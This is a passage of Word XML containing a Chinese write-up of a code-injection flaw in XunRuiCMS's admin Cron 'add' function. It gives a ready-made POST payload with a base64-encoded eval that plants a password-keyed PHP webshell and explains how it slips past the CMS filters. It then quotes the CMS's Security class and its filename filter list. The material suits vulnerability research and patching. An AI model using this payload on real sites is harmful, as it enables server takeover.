          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是我的一种方法</w:t>
      </w:r>
      <w:r>
        <w:t>,整个漏洞利用过程中,除了上述所述的关于add()函数中增加的对键值对的value的过滤,其他流程相较于之前的版本没有任何变化:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B448042" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0DF95BF1" w14:textId="4ECDCA6A" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r>
        <w:t>csrf_test_name之后,给</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
      </w:r>
      <w:r>
        <w:t>post以下内容:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248D8AF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="2FAD8AE4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>isform=1&amp;csrf_test_name=9f3342fbce7b49c85f05776bf89db778&amp;data%5B1%5D%5Bname%5D=1&amp;data%5B1%5D%5Bcode":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'%5D=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB61416" w14:textId="5D0596E1" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3A7A22C2" w14:textId="1103F7D3" w:rsidR="00F86DAB" w:rsidRDefault="00F86DAB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604723AE" w14:textId="1A74E358" w:rsidR="00F86DAB" w:rsidRDefault="00F86DAB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114258B9" wp14:editId="08B0AA49">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="10" name="Picture 10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0F017" w14:textId="77777777" w:rsidR="00F86DAB" w:rsidRDefault="00F86DAB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772D5FDD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过</w:t>
      </w:r>
      <w:r>
        <w:t>url解码后为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C39341" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="43F4E2BB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>isform=1&amp;csrf_test_name=9f3342fbce7b49c85f05776bf89db778&amp;data[1][name]=1&amp;data[1][code":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;']=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAE9AA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4BD2EE68" w14:textId="0A7E21B1" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:t>json编码和xss清洗以及dr_safe_filename()函数的过滤后,写入</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件中的内容为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7610E8D7" w14:textId="7C8165B1" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0B2739D4" w14:textId="62460C44" w:rsidR="00F86DAB" w:rsidRDefault="00F86DAB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34516904" w14:textId="66B17778" w:rsidR="00F86DAB" w:rsidRDefault="00F86DAB" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41412ACF" wp14:editId="5E9A6413">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="11" name="Picture 1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170E0" w14:textId="66D28F61" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="75140316" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;?php defined('FCPATH') OR exit('No direct script access allowed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7484D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> $json='{"1":{"name":"1","code\":\"1\"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw\/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'":"1","code":""}}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2328D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D7A291B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>post内容中的关键处为":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6287E180" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="11E2CC89" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:t>json编码和xss清洗以及dr_safe_filename()函数的过滤后,此处的内容变为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD5FDD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="15E36EB0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>\":\"1\"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw\/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A21C4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="728E2F25" w14:textId="110DAFA8" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>闭合了</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件中</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>的包裹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3A191" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="2D4A0CB9" w14:textId="26442928" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>### 包含写入的</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6CEE8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="27CC4884" w14:textId="60979A45" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过前面对</w:t>
      </w:r>
      <w:r>
        <w:t>add()函数的分析,调用add()函数时会首先在</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件存在时包含</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件,因此直接访问</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
      </w:r>
      <w:r>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306A633" w14:textId="4B53E058" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6BD2774B" w14:textId="192D40FE" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78230ADD" w14:textId="7364C222" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B788A4F" wp14:editId="71F14621">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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E7DE" w14:textId="77777777" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1122DFDA" w14:textId="2E8DEA93" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
      </w:r>
      <w:r>
        <w:t>后,在网站根目录下会生成一个名为webshell.php的文件,文件内容为</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>&lt;?php eval(@$_POST[“password”]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFCB25F" w14:textId="501C5254" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF"/>
    <w:p w14:paraId="698F418C" w14:textId="6D26CE93" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFD01F" w14:textId="119DBDB7" w:rsidR="00B85BFD" w:rsidRDefault="00B85BFD" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B83C37C" wp14:editId="084EF1AD">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="14" name="Picture 14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AA8B" w14:textId="77777777" w:rsidR="00304E3E" w:rsidRDefault="00304E3E" w:rsidP="00F122AF"/>
    <w:p w14:paraId="02BB608D" w14:textId="65724A99" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t># xss_clean()函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB1416" w14:textId="36D35E2C" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="766E450A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>&lt;?php namespace Phpcmf\Library;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B818C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485CDDE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> * {{www.xunruicms.com}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37C126" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> * {{迅睿内容管理框架系统}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F9A041" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> * 本文件是框架系统文件，二次开发时不可以修改本文件，可以通过继承类方法来重写此文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085A219" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> **/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A873AC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="066A581E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C32714" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> * 安全过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BEFC3D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF7F10" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>class Security {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A468E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="561182D6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D52FFE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * List of sanitize filename strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F24D4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65548EBD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @var</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F4CB90" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05324A87" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>public $filename_bad_chars = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7561D037" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'../', '&lt;!--', '--&gt;', '&lt;', '&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447DD081" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"'", '"', '&amp;', '$', '#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4CEE3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'{', '}', '[', ']', '=',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871B521" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>';', '?', '%20', '%22',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E8495" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%3c',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427140EA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%253c',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD4235B" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%3e',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D2570" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%0e',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7672092F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%28',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD74591" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%29',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509477F5" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%2528',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACAD941" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%26',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD77FF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%24',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// $</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F11BF8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%3f',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCAEAFD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%3b',</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA5B9FD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>'%3d'</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DCDCBA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C9FCA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6E5AE883" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    protected $naughty_tags  = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096EB84" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="28D5FF98" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    protected $evil_attributes = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB3F7D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0E7F6D03" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4985D452" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Character set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F2B87" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5966F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Will be overridden by the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589099A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75421449" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @var</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03112F55" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45517844" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>public $charset = 'UTF-8';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F9EDF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="77FEBD81" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8FEAB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * XSS Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EA2E4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BC438" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Random Hash for protecting URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F37C73" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA1507" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @var</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string</w:t>
      </w:r>
    </w:p>
